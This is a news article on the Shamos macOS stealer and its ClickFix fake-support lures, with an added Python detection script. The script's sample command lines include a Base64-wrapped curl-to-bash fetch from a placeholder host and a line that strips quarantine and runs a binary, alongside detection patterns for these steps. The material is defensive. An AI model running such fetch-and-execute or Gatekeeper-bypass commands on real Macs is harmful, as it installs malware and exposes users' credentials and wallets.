New Shamos Malware Targets Mac Users Through Fake Tech Support Sites
Cybersecurity researchers have unearthed a new Mac-targeting malware called Shamos that deceives users through fake troubleshooting guides and repair solutions. This information-stealing malware, developed by the cybercriminal organization "COOKIE SPIDER," represents a variant of the previously known Atomic macOS Stealer (AMOS).
Modus operandi
The malware spreads through ClickFix attacks, which utilize malicious advertisements and counterfeit GitHub repositories to trick victims. Attackers create deceptive websites such as mac-safer[.]com and rescue-mac[.]com that appear to offer legitimate macOS problem-solving assistance. These sites instruct users to copy and paste Terminal commands that supposedly fix common system issues.
However, these commands actually decode Base64-encoded URLs and retrieve malicious Bash scripts from remote servers. The scripts capture user passwords, download the Shamos executable, and use system tools like 'xattr' and 'chmod' to bypass Apple's Gatekeeper security feature.
Data theft capabilities
Once installed, Shamos performs comprehensive data collection targeting multiple sensitive areas. The malware searches for cryptocurrency wallet files, Keychain credentials, Apple Notes content, and browser-stored information. It employs anti-virtual machine commands to avoid detection in security sandboxes and uses AppleScript for system reconnaissance.
All stolen data gets compressed into an archive file named 'out.zip' before transmission to the attackers via curl commands. When operating with administrator privileges, Shamos establishes persistence by creating a Plist file in the LaunchDaemons directory, ensuring automatic execution during system startup.
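The pasted-command chain from the "Modus operandi" section (Base64-encoded URL, curl-fetched Bash script, xattr and chmod to sidestep Gatekeeper) and the LaunchDaemons persistence just described can be turned into simple heuristics over process command lines. The following is an added detection example written for this article, not CrowdStrike's rules or anything from the campaign; it assumes one shell command line per process-execution event, and the sample lines and the example.invalid URL are constructed.

```python
import base64
import re

# Heuristics derived from the article's description of the ClickFix chain.
# They are this example's own, not any vendor's detection rules (assumption:
# the input is one shell command line per process-execution event).
PATTERNS = {
    "base64_decode_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b"),
    "curl_to_shell": re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b"),
    "quarantine_strip": re.compile(r"\bxattr\b.*(?:\s-c\b|-r?d\s+com\.apple\.quarantine)"),
    "chmod_exec": re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]*7[0-7]*)\b"),
    # /Library/LaunchDaemons is the standard macOS launch-daemon directory.
    "launchdaemon_write": re.compile(r"/Library/LaunchDaemons/\S+\.plist"),
}
# Long Base64-looking tokens; decoded and kept only if they turn out to be URLs.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_embedded_urls(command: str) -> list[str]:
    """Return every Base64 token in the command that decodes to an http(s) URL."""
    urls = []
    for token in B64_TOKEN.findall(command):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text
        if decoded.startswith(("http://", "https://")):
            urls.append(decoded)
    return urls


def score_command(command: str) -> dict:
    """Match one command line against the ClickFix heuristics."""
    hits = [name for name, pat in PATTERNS.items() if pat.search(command)]
    urls = decode_embedded_urls(command)
    if urls:
        hits.append("base64_url")
    # Two independent indicators on one line is the alerting threshold here;
    # a lone chmod +x or xattr -c is routine developer activity.
    return {"hits": hits, "decoded_urls": urls, "suspicious": len(hits) >= 2}


# Constructed sample command lines (not real telemetry); the URL is a placeholder.
SAMPLE_B64 = base64.b64encode(b"https://example.invalid/fix.sh").decode()
SAMPLES = {
    "stage1": f"echo {SAMPLE_B64} | base64 -d | xargs curl -fsSL | bash",
    "stage2": "xattr -c /tmp/Update && chmod +x /tmp/Update && /tmp/Update",
    "benign_update": "softwareupdate --list",
    "benign_chmod": "chmod +x ./build.sh",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, score_command(cmd))
```

The decoded URL is the most useful artifact to pivot on, since the Base64 wrapper is exactly what keeps the destination out of a naive keyword match.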
CrowdStrike's monitoring has detected Shamos attempting infections across more than 300 environments globally since June 2025. The security firm has also observed instances where attackers deployed additional malicious components, including fake Ledger Live cryptocurrency applications and botnet modules.
Safety measures
Security experts strongly advise Mac users never to paste commands found online into Terminal unless they fully understand what each command does. Users should be particularly cautious with GitHub repositories, as the platform hosts numerous malicious projects designed to infect unsuspecting individuals.
For legitimate macOS assistance, users should skip sponsored search results and instead consult Apple Community forums or the built-in Help system (Cmd + Space → "Help"). ClickFix attacks have proven highly effective across various platforms, appearing in TikTok videos, fake CAPTCHAs, and bogus Google Meet error messages, making user awareness crucial for prevention.